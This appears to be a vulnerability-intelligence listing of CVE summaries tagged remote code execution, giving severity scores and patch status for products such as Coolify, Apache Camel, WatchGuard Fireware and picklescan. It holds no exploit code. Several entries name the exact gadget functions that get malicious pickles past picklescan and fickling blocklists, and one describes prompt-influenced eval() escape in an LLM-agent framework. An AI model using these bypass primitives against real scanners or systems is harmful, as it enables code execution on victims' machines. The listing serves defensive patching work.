Skip to main content

RCE

31864 CVEs technique

Monthly

CVE-2026-34038 CRITICAL PATCH Act Now

Remote command injection in Coolify (self-hosted PaaS) before 4.0.0-beta.469 lets an authenticated user with application write permissions inject OS commands through deployment-handling fields such as dockerfile_location, achieving arbitrary code execution on the deployment host and exfiltrating secrets via deployment logs. The flaw scores CVSS 9.9 because command injection breaks out of the application context to compromise the underlying server (scope change), exposing environment variables and other applications' secrets. No public exploit has been identified at time of analysis, but the fix is available in tagged release v4.0.0-beta.469.

Command Injection RCE Coolify
NVD GitHub
CVSS 3.1
9.9
EPSS
2.5%
CVE-2026-54769 PyPI CRITICAL PATCH GHSA Act Now

Remote code execution in the Langroid Python LLM-agent framework allows an attacker who can influence LLM prompts to escape the intended sandbox and run arbitrary OS commands on the host. The flaw affects TableChatAgent.pandas_eval() and the VectorStore base class, which pass LLM-generated expressions to Python's eval() with an empty locals dict but an unscrubbed globals dict, leaving __builtins__ implicitly available. A full working proof-of-concept is included in the advisory (publicly available exploit code exists); CVSS is scored 10.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H), though real-world exploitation is gated on the non-default full_eval=True setting.

Code Injection Python RCE
NVD GitHub
CVSS 3.1
10.0
EPSS
0.9%
CVE-2026-54637 Go MEDIUM PATCH GHSA This Month

Unauthenticated SSRF in Dragonfly's scheduler v1 gRPC service allows any remote client to force the scheduler to issue HTTP GET requests to arbitrary internal addresses, including loopback (127.0.0.1), cloud metadata endpoints (169.254.0.0/16), and RFC1918 ranges. The scheduler's `DownloadTinyFile()` function constructs HTTP requests from attacker-controlled `PeerHost.Ip` and `PeerHost.DownPort` gRPC fields with no destination address validation, and stores up to 128 bytes of each fetched response in `Task.DirectPiece`, which is subsequently served to other peers. The input tag of 'RCE' in the source intelligence is incorrect - this is a read-SSRF with a limited exfiltration path, not remote code execution. A fully confirmed proof-of-concept exists against v2.4.4-rc.2; no patched release version has been identified at time of analysis.

SSRF RCE
NVD GitHub
CVE-2026-57571 PyPI CRITICAL PATCH Act Now

Arbitrary file write in Crawl4AI (the open-source LLM-friendly web crawler by unclecode) before version 0.9.0 lets a malicious website or download control where crawled files land on disk, and because the file contents are also attacker-controlled this escalates to remote code execution. Both the HTTP crawler path (trusting the response Content-Disposition filename) and the browser crawler path (trusting the download's suggested filename) are affected. CVSS is 9.6 (Critical); no public exploit is identified at time of analysis and it is not listed in CISA KEV, but a fix commit and GHSA advisory are published.

Path Traversal RCE Crawl4ai
NVD GitHub
CVSS 3.1
9.6
EPSS
0.5%
CVE-2026-52889 PHP CRITICAL PATCH GHSA Act Now

Server-side template injection in Formie, a forms plugin for Craft CMS 5 (verbb/formie 3.0.0-beta.1 through 3.1.26), allows unauthenticated attackers to inject Twig syntax through request-controlled inputs that Hidden fields use as dynamic default values. When a public form contains a Hidden field seeded from the User Agent, Referer, Current URL, a query parameter, or a cookie, the attacker-supplied value reaches Craft's Twig rendering layer and is evaluated server-side, potentially yielding information disclosure, application-state modification, or remote code execution. No public exploit identified at time of analysis, though the flaw is tagged RCE/SSTI and rated CVSS 9.8.

Ssti RCE
NVD GitHub
CVSS 3.1
9.8
CVE-2026-48614 CRITICAL PATCH Act Now

Privilege escalation in the Plesk web hosting control panel lets an authenticated low-privileged user abuse an improper authorization flaw in the XML API to inject arbitrary configuration directives, achieving arbitrary file write as root and full compromise of the underlying server. Rated CVSS 9.9 with a scope change, this turns any valid panel account into root on the host; no public exploit identified at time of analysis and it is not listed in CISA KEV.

Code Injection Privilege Escalation RCE Plesk
NVD VulDB
CVSS 3.1
9.9
EPSS
0.3%
CVE-2026-48316 CRITICAL Act Now

Remote code execution in Adobe ColdFusion 2025.9, 2023.20 and all earlier releases lets an unauthenticated network attacker run arbitrary code in the context of the current user via improper input validation (CWE-20), with no user interaction and a scope change to other components. Adobe rates this maximum severity (CVSS 10.0) and self-reported it; there is no public exploit identified at time of analysis and it is not yet listed in CISA KEV. Given ColdFusion's long history of mass-exploited RCE flaws, patching should be treated as urgent despite the current absence of a public PoC.

RCE Coldfusion
NVD VulDB
CVSS 3.1
10.0
EPSS
1.4%
CVE-2026-43825 HIGH PATCH This Week

Untrusted Java deserialization in Apache OpenNLP's SvmDoccatModel (libsvm document categorization module, versions 3.0.0-M1 through before 3.0.0-M4) lets an attacker who supplies a crafted serialized stream to the public static SvmDoccatModel.deserialize(InputStream) trigger deserialization of an arbitrary object graph before the SvmDoccatModel cast occurs. Where a usable gadget chain exists on the consuming application's classpath, this yields remote code execution in the loading JVM; OpenNLP ships no gadget itself, so realistic risk falls on downstream apps that embed the module alongside vulnerable transitive dependencies. No public exploit identified at time of analysis and the flaw is not in CISA KEV, though the SSVC assessment marks it automatable with partial technical impact.

Deserialization Java RCE Apache Apache Opennlp
NVD
CVSS 3.1
7.3
EPSS
4.8%
CVE-2025-53829 HIGH PATCH This Week

Remote code execution in ownCloud 10 (before 10.15.3) lets an authenticated administrator abuse a relative path traversal weakness to write or reference files outside intended directories and execute arbitrary code on the server. The high-privilege requirement (PR:H) and high attack complexity (AC:H) constrain who can trigger it, but successful exploitation yields full compromise with a scope change beyond the application context. No public exploit has been identified at time of analysis and the flaw is not listed in CISA KEV.

Path Traversal RCE Owncloud 10
NVD GitHub VulDB
CVSS 3.1
8.0
EPSS
0.3%
CVE-2025-53828 HIGH PATCH This Week

Server-side request forgery escalating to remote code execution in the SharePoint for ownCloud app (versions prior to 0.4.1, bundled with ownCloud 10 before 10.15.3) lets an already-authenticated administrator coerce the server into making attacker-controlled requests that ultimately run arbitrary code on the host. The flaw is tagged RCE/SSRF and carries an 8.5 CVSS with a scope change (S:C), reflecting that abuse of the SharePoint integration crosses a trust boundary into the underlying system. No public exploit identified at time of analysis and it is not listed in CISA KEV, so this is a patch-and-move-on issue rather than an active-threat emergency.

SSRF Microsoft RCE Sharepoint Owncloud 10
NVD GitHub
CVSS 3.1
8.5
EPSS
0.2%
CVE-2025-53827 CRITICAL PATCH Act Now

Arbitrary code execution in ownCloud Core (ownCloud 10 Classic server, all versions before 10.15.3) allows an administrator to abuse an exposed dangerous method in the Updater component to run code on the server host. Any actor holding administrative credentials - legitimately, or via session hijack/credential theft/CSRF against an admin - can convert web-app admin rights into full server compromise. No public exploit identified at time of analysis and it is not listed in CISA KEV; the vendor-issued GHSA-hvcx-ph66-mmvw advisory and the fix in 10.15.3 are the primary confirmation.

RCE Owncloud Core
NVD GitHub
CVSS 3.1
9.1
EPSS
0.3%
CVE-2026-58380 HIGH This Week

Stack-based memory corruption in GIMP's PNM image parser lets an attacker execute code or crash the application when a victim opens a malicious PNM/PBM/PGM/PPM file. The flaw is an off-by-one in pnmscanner_gettoken() that writes a null terminator one byte past a stack buffer; it is local and requires the user to open the crafted file (UI:R). No public exploit is identified at time of analysis, and EPSS is low (0.12%), consistent with the CISA SSVC 'Exploitation: none' judgment.

Denial Of Service Buffer Overflow RCE Red Hat Enterprise Linux 6 Red Hat Enterprise Linux 7 +2
NVD VulDB
CVSS 3.1
7.8
EPSS
0.1%
CVE-2026-58226 HIGH PATCH This Week

Unauthenticated denial-of-service in elixir-mint's hpax (the HPACK header-compression library for Elixir HTTP/2, versions 0.1.1 through 1.0.3) allows a remote attacker to force superlinear (~O(N²)) CPU consumption by sending a small header block containing an HPACK integer with a long run of continuation octets. Because BEAM integers are arbitrary-precision, the decoder builds an ever-growing bignum with no upper bound, turning a few crafted bytes into a large, attacker-controlled amount of CPU and transient memory - a classic decompression/amplification DoS. No public exploit is identified at time of analysis and it is not in CISA KEV, but a vendor patch (version 1.0.4) is available.

RCE Hpax
NVD GitHub VulDB
CVSS 4.0
8.7
EPSS
0.4%
CVE-2026-43867 CRITICAL PATCH Act Now

Java object deserialization in the Apache Camel camel-pqc component allows code execution in the key-management application when an attacker who can write to the backing AWS Secrets Manager secret stores a malicious serialized payload. The flaw affects Apache Camel 4.18.0-4.18.2 and 4.19.0-4.20.x, where AwsSecretsManagerKeyLifecycleManager.deserializeMetadata() calls a raw ObjectInputStream.readObject() with no class filter, so gadget side effects fire before the KeyMetadata cast. Rated CVSS 9.8 by Apache, but exploitation genuinely requires IAM write access to the specific secret; there is no public exploit identified at time of analysis and EPSS is low at 0.19% (8th percentile).

Deserialization Hashicorp RCE Apache Apache Camel
NVD VulDB
CVSS 3.1
9.8
EPSS
0.2%
CVE-2026-46590 HIGH PATCH This Week

Remote code execution via unsafe Java deserialization affects the camel-pqc component of Apache Camel 4.18.0-4.18.2 and 4.19.0-4.20.x. The HashiCorp Vault and AWS Secrets Manager KeyLifecycleManager implementations (and a legacy-migration path in the file-based manager) read post-quantum key metadata back with a raw ObjectInputStream.readObject() lacking any ObjectInputFilter or allow-list, so a principal able to write to the key backend can plant a gadget object that executes during normal key-lifecycle operations. No public exploit has been identified at time of analysis and EPSS is low (0.19%), but SSVC rates technical impact as total; this is an incomplete-remediation follow-on to CVE-2026-40048.

Deserialization Hashicorp RCE Apache Apache Camel
NVD VulDB
CVSS 3.1
8.8
EPSS
0.2%
CVE-2026-46454 CRITICAL PATCH Act Now

Unauthenticated Camel control-header injection in Apache Camel's camel-cometd component (4.0.0 before 4.14.8, 4.15.0 before 4.18.3, and 4.19.0 before 4.21.0) lets any client that completes a Bayeux/CometD handshake inject internal headers such as CamelHttpUri, CamelFileName or CamelJmsDestinationName into the Camel Exchange, hijacking the behaviour of downstream producers. Because a CometdComponent installs no Bayeux SecurityPolicy by default, no authentication is required (PR:N), and the injected headers survive internal direct/seda/vm hops. Reported by Apache with a fix in 4.21.0; there is no public exploit identified at time of analysis and EPSS is low at 0.19% (9th percentile).

RCE Microsoft Apache Apache Camel
NVD VulDB
CVSS 3.1
9.8
EPSS
0.2%
CVE-2026-43865 HIGH PATCH This Week

Remote code execution in the Apache Camel camel-hazelcast component allows an attacker who can join or reach the Hazelcast cluster to run arbitrary code on every Camel node. The flaw exists because Camel-created Hazelcast instances apply no Java deserialization filter by default, so crafted serialized objects sent over the cluster protocol are deserialized (ObjectInputStream.readObject) before Camel processes them. It affects Camel 4.0.0-4.14.7, 4.15.0-4.18.2, and 4.19.0-4.20.x whenever a hazelcast consumer or repository uses Camel's own default configuration; there is no public exploit identified at time of analysis and EPSS is low (0.49%, 39th percentile).

Deserialization Java RCE Apache Apache Camel
NVD VulDB
CVSS 3.1
8.1
EPSS
0.5%
CVE-2026-40859 HIGH PATCH This Week

Remote code execution in Apache Camel's camel-vertx-http component (4.0.0-4.14.7, 4.15.0-4.18.2, 4.19.0) arises when a producer endpoint deserializes 5xx HTTP response bodies marked application/x-java-serialized-object through a raw java.io.ObjectInputStream with no class filtering. Exploitation is limited to non-default deployments where transferException=true or allowJavaSerializedObject=true is set and throwExceptionOnFailure remains true, letting an attacker who controls or intercepts the backend deliver a malicious serialized object and, given a gadget chain on the classpath, run code on the Camel host. This is a vendor-reported (Apache) issue with a publicly available advisory; there is no public exploit identified at time of analysis and EPSS is low at 0.39% (31st percentile).

Deserialization Java RCE Apache Apache Camel
NVD VulDB
CVSS 3.1
8.1
EPSS
0.4%
CVE-2026-11962 HIGH POC PATCH This Week

Authenticated remote code execution in the FileOrganizer WordPress plugin before 1.2.0 lets users granted file-manager access upload arbitrary PHP files because several file-management operations skip file-type validation. Publicly available exploit code exists, and the flaw is an incomplete fix of CVE-2024-7985, which only hardened the upload operation while leaving other file-management endpoints unvalidated. With CVSS 3.1 base 8.8 (PR:L) and a working PoC, any low-privileged account with file-manager rights - extendable to sub-administrator roles via the premium add-on - can achieve full site compromise.

WordPress RCE PHP Fileorganizer
NVD WPScan
CVSS 3.1
8.8
EPSS
0.2%
CVE-2026-53913 CRITICAL PATCH Act Now

Authentication bypass in Apache Camel's camel-keycloak component (versions 4.15.0-4.18.2 and 4.19.0-4.20.x) allows any caller presenting a non-null Authorization: Bearer header value - including an arbitrary string or a forged, unsigned JWT - to bypass Keycloak token verification entirely and access routes protected by KeycloakSecurityPolicy. The cryptographic token checks (signature, issuer, expiry) are embedded exclusively inside role and permission validation routines that are never invoked when requiredRoles and requiredPermissions are empty, which is the documented default 'Basic Setup.' Where the protected route connects to a code-execution-capable Camel producer, this authentication bypass can escalate to unauthenticated remote code execution; no public exploit has been identified at time of analysis.

Authentication Bypass Apache RCE Camel
NVD VulDB
CVSS 3.1
9.8
EPSS
0.3%
CVE-2026-14749 MEDIUM POC This Month

Remote PHP code injection in stumasy's calculator module allows unauthenticated network attackers to execute arbitrary server-side code by manipulating the `mathematical_sentence` parameter passed unsanitized into PHP's `eval()` function in calculate.php. A public proof-of-concept exploit exists (GitHub issue #5), and no patch has been released - the project maintainer has not responded to the disclosure. The rolling release model means no fixed version can be cited; the vulnerability is present through at least commit 327d1b0f2915ba79d7ef8ebb74553e987609d9be.

Code Injection PHP RCE Stumasy
NVD VulDB GitHub
CVSS 4.0
5.5
EPSS
0.3%
CVE-2026-14722 npm MEDIUM POC This Month

Code injection in TidGi-Desktop up to version 0.13.0 allows remote attackers to execute arbitrary code through the application's Git Repository Import feature, specifically within the sub-wiki loading worker. The flaw resides in `src/services/wiki/wikiWorker/loadWikiTiddlersWithSubWikis.ts`, where externally-sourced Git repository content is processed without adequate code-injection safeguards (CWE-94). A public exploit has been disclosed and referenced via the GitHub security advisory GHSA-9hc2-hjx8-q6pv, though no CISA KEV listing exists at time of analysis.

Code Injection RCE Tidgi Desktop
NVD VulDB GitHub
CVSS 4.0
5.5
EPSS
0.3%
CVE-2026-14691 LOW POC Monitor

Code injection in SourceCodester Multi-Vendor Online Grocery Management System 1.0 allows remote low-privileged attackers to execute arbitrary PHP code by manipulating the `content[]` argument passed to the `update_settings_info` function in `classes/SystemSettings.php`. A public proof-of-concept exploit has been disclosed on GitHub, and exploitation requires only a low-privileged authenticated session over the network. No CISA KEV listing exists, but the public exploit materially lowers the barrier for opportunistic attacks against any internet-exposed instance.

Code Injection PHP RCE Multi Vendor Online Grocery Management System
NVD VulDB GitHub
CVSS 4.0
2.1
EPSS
0.2%
CVE-2026-14534 PyPI HIGH PATCH This Week

Arbitrary code execution bypass in Trail of Bits fickling (versions ≤ 0.1.10) allows attackers to craft malicious pickle files that the tool's check_safety() gate rates LIKELY_SAFE with zero findings. Because the standard-library modules _posixsubprocess, site, and atexit are missing from the UNSAFE_IMPORTS denylist in fickle.py, payloads invoking _posixsubprocess.fork_exec, site.execsitecustomize, or atexit._run_exitfuncs pass the scanner and are then deserialized and executed by fickling.load(), which chains check_safety() into pickle.loads() as its security gate. No public exploit has been identified at time of analysis, and no EPSS or KEV signals are present in the input, but the advisory documents the exact bypass primitives.

Python RCE Fickling
NVD GitHub VulDB
CVSS 3.1
8.8
EPSS
0.3%
CVE-2026-12195 HIGH POC PATCH This Week

Authenticated OS command injection in the myVesta hosting control panel lets a low-privileged user inject arbitrary shell commands through the v_ftp_user parameter during FTP-account deletion, escalating to full command execution as the admin user and takeover of the panel. Publicly available exploit code exists (documented by ProjectBlack/PRJBLK) and a vendor fix commit has been published, though no CISA KEV listing or EPSS data is provided. Because a scope change moves the attacker from a low-privilege panel account to admin-level command execution, this is a high-impact privilege-escalation-to-RCE path.

Command Injection RCE Vesta
NVD GitHub VulDB
CVSS 4.0
8.5
EPSS
0.7%
CVE-2025-71375 PyPI HIGH PATCH This Week

Malicious code execution via scanner bypass affects picklescan before 0.0.34, a security tool used to vet pickle files for unsafe deserialization before loading ML model artifacts. The scanner fails to flag the _operator.methodcaller built-in, so an attacker can craft a pickle that passes picklescan's malware check yet executes arbitrary code the moment a victim calls pickle.load(). No public exploit has been identified at time of analysis, and the flaw is not on CISA KEV; the fix landed in version 0.0.34.

Deserialization RCE Picklescan
NVD GitHub VulDB
CVSS 4.0
7.6
EPSS
0.4%
CVE-2025-71373 PyPI HIGH PATCH This Week

Detection bypass in picklescan before 0.0.33 lets attackers slip malicious pickle files past its security scanner by using operator.methodcaller, a callable the scanner's blocklist did not recognize. Any ML pipeline, model hub, or workflow that trusts picklescan to vet untrusted pickle/model files is affected, because a crafted payload will be marked safe yet execute arbitrary code the moment the file is deserialized. No public exploit identified at time of analysis and the flaw is not in CISA KEV, but the bypass technique is straightforward and the issue is tagged RCE by the reporting source (VulnCheck).

RCE Picklescan
NVD GitHub VulDB
CVSS 4.0
7.6
EPSS
0.4%
CVE-2025-71372 PyPI HIGH PATCH This Week

Security-scanner bypass in Picklescan before 0.0.33 lets attackers smuggle arbitrary-code-execution payloads past its safety checks by abusing the numpy.f2py.crackfortran.getlincoef gadget inside a pickle __reduce__ method, which the scanner fails to flag as dangerous. Because Picklescan is used to vet shared machine-learning model files, a malicious pickle passes as 'clean' and then executes attacker-controlled Python when the trusting downstream consumer deserializes it. No public exploit is identified at time of analysis, and it is not listed in CISA KEV; the CVSS 4.0 score is 7.6 and the attack depends on a victim actually loading the file.

Deserialization Python RCE Picklescan
NVD GitHub VulDB
CVSS 4.0
7.6
EPSS
0.4%
CVE-2025-71369 PyPI HIGH PATCH This Week

Safety-check bypass in picklescan before 0.0.28 allows attackers to smuggle malicious pickle files past the scanner by abusing torch.utils.data.datapipes.utils.decoder.basichandlers as a reduce gadget, so a payload the tool reports as clean still executes arbitrary code when the victim deserializes it. Because picklescan is a defensive scanner used to vet untrusted ML models (notably in Hugging Face workflows), this blind spot converts a trusted safety gate into a false sense of security. No public exploit identified at time of analysis, and it is not on CISA KEV; CVSS 4.0 base score is 7.6.

Deserialization RCE Picklescan
NVD GitHub VulDB
CVSS 4.0
7.6
EPSS
0.4%
CVE-2025-71367 PyPI HIGH PATCH This Week

Security-scanner detection bypass in picklescan before 0.0.34 lets attackers slip malicious pickle files past its checks by invoking _operator.attrgetter inside a reduce method, so a file the scanner reports as clean still executes arbitrary code when pickle.load() deserializes it. The flaw affects ML/AI supply-chain pipelines that rely on picklescan to vet untrusted model files. No public exploit identified at time of analysis; the issue was reported by VulnCheck and fixed in 0.0.34.

Deserialization RCE Picklescan
NVD GitHub VulDB
CVSS 4.0
7.6
EPSS
0.4%
CVE-2025-71366 PyPI HIGH PATCH This Week

Security-scanner evasion in picklescan before 0.0.28 lets attackers slip malicious pickle files past its safety checks by abusing the torch.utils.bottleneck.__main__.run_cprofile call, which the scanner's blocklist does not recognize as dangerous. Any ML pipeline or platform that relies on picklescan to vet untrusted models will therefore approve a weaponized file, and the embedded code runs with arbitrary execution when the victim deserializes it. No public exploit identified at time of analysis; not listed in CISA KEV, but VulnCheck published a dedicated advisory and the technique is fully documented.

Deserialization RCE Picklescan
NVD GitHub VulDB
CVSS 4.0
7.6
EPSS
0.4%
CVE-2025-71364 PyPI HIGH PATCH This Week

Detection bypass in picklescan before 0.0.30 lets a crafted pickle smuggle the asyncio.unix_events._UnixSubprocessTransport._start built-in past the scanner's malicious-opcode checks, so a model or pickle that picklescan reports as safe actually executes arbitrary OS commands when a victim deserializes it. Because picklescan is a security scanner used to vet untrusted ML artifacts (e.g. in AI model supply chains), this false-negative turns a trusted safety gate into a blind spot. No public exploit identified at time of analysis and it is not on CISA KEV, but the technique is fully described in the VulnCheck advisory.

Deserialization RCE Picklescan
NVD GitHub VulDB
CVSS 4.0
7.6
EPSS
0.6%
CVE-2025-71359 PyPI HIGH PATCH This Week

Detection bypass in picklescan before 0.0.29 lets attackers slip malicious pickle payloads past the scanner by abusing lib2to3.pgen2.grammar.Grammar.loads inside a pickle reduce method, resulting in remote code execution when the file is later deserialized with pickle.load(). Because picklescan is trusted as a safety gate for machine-learning model files, a bypass converts a 'scanned and clean' verdict into silent arbitrary code execution. No public exploit has been identified at time of analysis and the flaw is not listed in CISA KEV, though the technique is concretely described in the VulnCheck advisory.

Deserialization RCE Picklescan
NVD GitHub VulDB
CVSS 4.0
7.6
EPSS
0.4%
CVE-2025-71347 PyPI HIGH PATCH This Week

Security-scanner evasion in picklescan before 0.0.33 lets attackers smuggle malicious pickle files past its detection engine by abusing the numpy.f2py.crackfortran.param_eval function inside a pickle reduce method, so a payload the scanner declares safe still triggers arbitrary code execution when the application deserializes it. This defeats the exact protection picklescan exists to provide, endangering ML pipelines that rely on it to vet untrusted model/pickle files (e.g., Hugging Face-style workflows). No public exploit is identified at time of analysis and it is not in CISA KEV, though VulnCheck published an advisory.

Deserialization RCE Picklescan
NVD GitHub VulDB
CVSS 4.0
7.6
EPSS
0.4%
CVE-2025-71345 PyPI HIGH PATCH This Week

Malicious-pickle detection bypass in picklescan before 0.0.30 allows attackers to smuggle undetected remote code execution payloads past the scanner by abusing the torch.utils.bottleneck.__main__.run_autograd_prof gadget, which was absent from picklescan's dangerous-import blocklist. Because picklescan is used as a security gate to vet untrusted ML model files, a false-negative here means a crafted model passes as safe and executes arbitrary code when subsequently deserialized. Reported by VulnCheck via GHSA-4whj-rm5r-c2v8; no public exploit identified at time of analysis, and it is not on CISA KEV.

Deserialization RCE Picklescan
NVD GitHub VulDB
CVSS 4.0
7.6
EPSS
0.4%
CVE-2025-71342 PyPI HIGH PATCH This Week

Malicious pickle detection bypass in picklescan before 0.0.30 lets attackers hide code that runs during pickle.load, because the scanner does not flag the idlelib.run.Executive.runcode primitive used in a reduce method. Since picklescan is a security tool relied upon to vet PyTorch/ML model files, this bypass turns a trusted safety check into a false 'clean' verdict, enabling remote code execution and supply-chain attacks against anyone loading an attacker-supplied model. Reported by VulnCheck; no public exploit identified at time of analysis and not listed in CISA KEV.

Deserialization RCE Picklescan
NVD GitHub VulDB
CVSS 4.0
7.6
EPSS
0.4%
CVE-2026-12252 PyPI HIGH PATCH This Week

Arbitrary code execution in the NLTK Python library (nltk/nltk 3.9.3 and earlier) allows an attacker to run untrusted Java code when a victim loads a malicious JAR through five Stanford interface wrappers (StanfordPOSTagger, StanfordNERTagger, StanfordParser, StanfordDependencyParser, StanfordNeuralDependencyParser). These classes pass a user-controllable JAR path to an internal java() helper that calls subprocess.Popen() with no SHA256 integrity check, so a substituted or poisoned JAR executes with the user's privileges. This is a regression of CVE-2026-0848, whose SHA256 verification fix was applied only to StanfordSegmenter and never propagated to these five classes; no public exploit is identified at time of analysis, though a huntr bounty report exists.

Code Injection RCE Nltk Nltk Red Hat
NVD VulDB
CVSS 3.0
7.8
EPSS
0.1%
CVE-2026-12481 CRITICAL Act Now

Arbitrary code execution in keras-team/keras 3.14.0 lets remote attackers run OS-level commands by supplying a malicious serialized `Lambda` layer that is deserialized without an active `SafeModeScope`. The root cause is `_raise_for_lambda_deserialization()` treating a `None` `safe_mode` (the default when `from_config()` runs outside a `SafeModeScope`) as if it were an explicit `False`, so the safe-mode guard is skipped and attacker-controlled `marshal` bytecode executes. SSVC rates technical impact as total with a proof-of-concept available; EPSS is modest at 0.40% (32nd percentile), and the flaw is not in CISA KEV.

Deserialization RCE Keras Team Keras Red Hat
NVD
CVSS 3.1
9.8
EPSS
0.4%
CVE-2026-58379 HIGH This Week

Heap-based buffer overflow in GIMP's Paint Shop Pro (PSP) image format parser lets an attacker achieve arbitrary code execution or crash the application when a victim opens a maliciously crafted PSP file. The flaw stems from incorrect buffer-size arithmetic on low bit-depth images, and affects GIMP as shipped across Red Hat Enterprise Linux 6 through 9. There is no public exploit identified at time of analysis, and the issue is not listed in CISA KEV; exploitation requires local file-open interaction (CVSS 7.3).

Heap Overflow Denial Of Service Buffer Overflow RCE Red Hat Enterprise Linux 6 +3
NVD VulDB
CVSS 3.1
7.3
EPSS
0.2%
CVE-2026-14631 MEDIUM PATCH This Month

webpack-dev-server 5.2.5 and earlier crash the entire Node.js host process when an unauthenticated remote peer sends either an HTTP request with a malformed Host header or a WebSocket upgrade to the /ws endpoint with a malformed Origin header. The malformed value bypasses graceful error handling in the host-validation path, triggering an uncaught exception that terminates the dev server process entirely. Impact is confined to availability - no confidentiality loss and no code execution occur despite a misleading 'RCE' tag in the source intelligence, which appears to be a mislabeling inconsistent with the vendor description and CVSS vector (C:N/I:N). No public exploit or CISA KEV listing exists at time of analysis.

Node.js RCE Webpack Dev Server Red Hat Suse
NVD GitHub VulDB
CVSS 3.1
5.3
EPSS
0.3%
CVE-2026-11778 MEDIUM This Month

Arbitrary shortcode execution in the CURCY Multi Currency for WooCommerce WordPress plugin (versions up to and including 2.2.14) allows unauthenticated attackers to invoke any registered WordPress shortcode by sending a crafted request to a vulnerable action handler in frontend/cache.php. The root cause is a failure to validate the shortcode value before passing it to do_shortcode(), meaning any shortcode registered on the site - including those that expose user data, perform database queries, or render sensitive page content - can be triggered without authentication. No public exploit has been identified at time of analysis, and no CISA KEV listing is present, though the low attack complexity and zero-authentication requirement elevate practical risk above what the moderate CVSS score suggests.

Code Injection WordPress RCE Curcy Multi Currency For Woocommerce Smoothly On Woocommerce 9 X
NVD
CVSS 3.1
5.4
EPSS
0.3%
CVE-2026-14544 CRITICAL Act Now

Remote code execution and privilege escalation in HPLIP (HP Linux Imaging and Printing) affects the hpcups print filter across Red Hat Enterprise Linux 6 through 10, where an integer overflow triggered by specially crafted print data can corrupt memory. This is an incomplete-fix follow-up to CVE-2026-8631, meaning the original patch did not fully close the flaw, and no public exploit has been identified at time of analysis. The Red Hat CVSS of 9.8 reflects a network-reachable, unauthenticated attack path, though realistic exploitation depends on how the CUPS print pipeline is exposed.

Integer Overflow HP RCE Red Hat Enterprise Linux 10 Red Hat Enterprise Linux 6 +3
NVD VulDB
CVSS 3.1
9.8
EPSS
0.5%
CVE-2026-9725 CRITICAL Act Now

Arbitrary file deletion in the Printcart Web to Print Product Designer for WooCommerce WordPress plugin (versions up to and including 2.5.2) lets unauthenticated attackers delete any file on the server, potentially escalating to remote code execution. The store_design_data() function builds a filesystem path from the attacker-controlled 'nbd_item_key' POST value and the nonce guarding the AJAX action can be freely retrieved by anonymous users, so exploitation needs no login. No public exploit has been identified at time of analysis, but the network-reachable, no-privilege profile makes this a high-priority patch.

WordPress Path Traversal RCE Printcart Web To Print Product Designer For Woocommerce
NVD VulDB
CVSS 3.1
9.1
EPSS
0.7%
CVE-2026-8921 HIGH This Week

Local privilege escalation to SYSTEM in ASUS Business Manager lets a low-privileged local user run arbitrary code by tampering with an inter-process communication (IPC) message that the software's privileged service trusts. Because the SYSTEM-level component controls a file name or path based on attacker-influenced IPC input (CWE-73), a standard user can coerce it into loading or executing attacker-chosen content. No public exploit has been identified at time of analysis and the flaw is not listed in CISA KEV; ASUS is the reporter and has issued a security advisory.

RCE Asus Business Manager
NVD
CVSS 4.0
8.5
EPSS
0.1%
CVE-2026-13053 HIGH This Week

Authenticated command execution in WatchGuard Fireware OS lets a privileged administrator escalate a specially crafted CLI command into arbitrary code execution via an out-of-bounds write (CWE-787). The flaw affects a very broad version span (Fireware OS 11.0 through 11.12.4_Update1, 12.0 through 12.12, and 2025.1 through 2026.2), placing most currently and historically deployed WatchGuard Firebox appliances in scope. No public exploit identified at time of analysis and the issue is not listed in CISA KEV; the CVSS 4.0 score of 8.6 reflects full confidentiality/integrity/availability impact once the required privileged access is obtained.

Memory Corruption Watchguard Buffer Overflow RCE Fireware Os
NVD VulDB
CVSS 4.0
8.6
EPSS
0.4%
CVE-2026-13050 HIGH This Week

Remote code execution in WatchGuard Fireware OS (the operating system powering Firebox network security appliances) allows an authenticated privileged administrator to run arbitrary code on the firewall by sending specially crafted requests to the Management Web UI, which trigger an out-of-bounds write in the networkd process. The flaw spans a wide version range (11.8 through 11.12.4_Update1, 12.0 through 12.12, and 2025.1 through 2026.2) and carries a CVSS 4.0 base score of 8.6 (High). It was reported by WatchGuard's own PSIRT; there is no public exploit identified at time of analysis and it is not listed in CISA KEV.

Memory Corruption Watchguard Buffer Overflow RCE Fireware Os
NVD VulDB
CVSS 4.0
8.6
EPSS
0.4%
CVE-2026-8247 HIGH This Week

Remote code execution in WatchGuard Fireware OS (the firmware powering WatchGuard Firebox firewall appliances) allows an unauthenticated attacker positioned on the same local/adjacent network segment to trigger an out-of-bounds write and execute arbitrary code. The flaw spans a wide firmware range - 11.0 through 11.12.4_Update1, 12.0 through 12.12, and 2025.1 through 2026.2 - and was self-reported by WatchGuard via its PSIRT. There is no public exploit identified at time of analysis and it is not listed in CISA KEV, but the network-adjacent, unauthenticated, high-impact profile makes it a serious perimeter-device concern.

Watchguard Buffer Overflow RCE Fireware Os
NVD VulDB
CVSS 4.0
7.7
EPSS
0.2%
CVE-2026-13368 CRITICAL Act Now

Remote code execution in WatchGuard Fireware OS affects Fireboxes running a Mobile User VPN with IKEv2 that authenticates against an external LDAP server. A race condition in the IKEv2 LDAP authentication path can be driven into a use-after-free (CWE-416) inside the iked daemon, letting a remote unauthenticated attacker execute arbitrary code in the context of that process. No public exploit identified at time of analysis, and the CVSS 4.0 base score of 9.2 is tempered by high attack complexity and a probabilistic attack requirement (AC:H/AT:P), reflecting the difficulty of reliably winning the race.

Memory Corruption Watchguard Use After Free RCE Fireware Os
NVD VulDB
CVSS 4.0
9.2
EPSS
0.6%
CVE-2026-13384 HIGH This Week

Authenticated arbitrary code execution in WatchGuard Fireware OS (12.1-12.12 and 2025.1-2026.2) arises from an out-of-bounds write in the wgagent process, reachable when a privileged user sends specially crafted requests to the Management Web UI. A high-privilege attacker (or one who has compromised admin credentials) can corrupt memory to run code on the firewall appliance, undermining the security gateway itself. No public exploit has been identified at time of analysis, and the issue is not listed in CISA KEV.

Memory Corruption Watchguard Buffer Overflow RCE Fireware Os
NVD VulDB
CVSS 4.0
8.6
EPSS
0.4%
CVE-2026-13383 HIGH This Week

Arbitrary code execution in WatchGuard Fireware OS (the firmware powering Firebox network security appliances) arises from an out-of-bounds write in the ikestubd process, reachable through the Management Web UI. An authenticated user holding privileged (administrative) access can send specially crafted requests to corrupt memory and execute code on the appliance. No public exploit identified at time of analysis and the issue is not listed in CISA KEV; risk is bounded by the requirement for existing privileged access.

Memory Corruption Watchguard Buffer Overflow RCE Fireware Os
NVD VulDB
